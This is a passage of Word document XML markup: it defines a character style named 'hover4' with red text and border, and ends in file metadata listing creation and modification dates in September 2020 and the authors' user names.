      <w:bdr w:val="single" w:color="E33E33" w:sz="4" w:space="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="hover4"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="E33E33"/>
      <w:bdr w:val="single" w:color="E33E33" w:sz="4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2020-09-01T06:39:00Z</dcterms:created>
  <dc:creator>86133</dc:creator>
  <cp:lastModifiedBy>kotonami_wataru</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-05T09:24:15Z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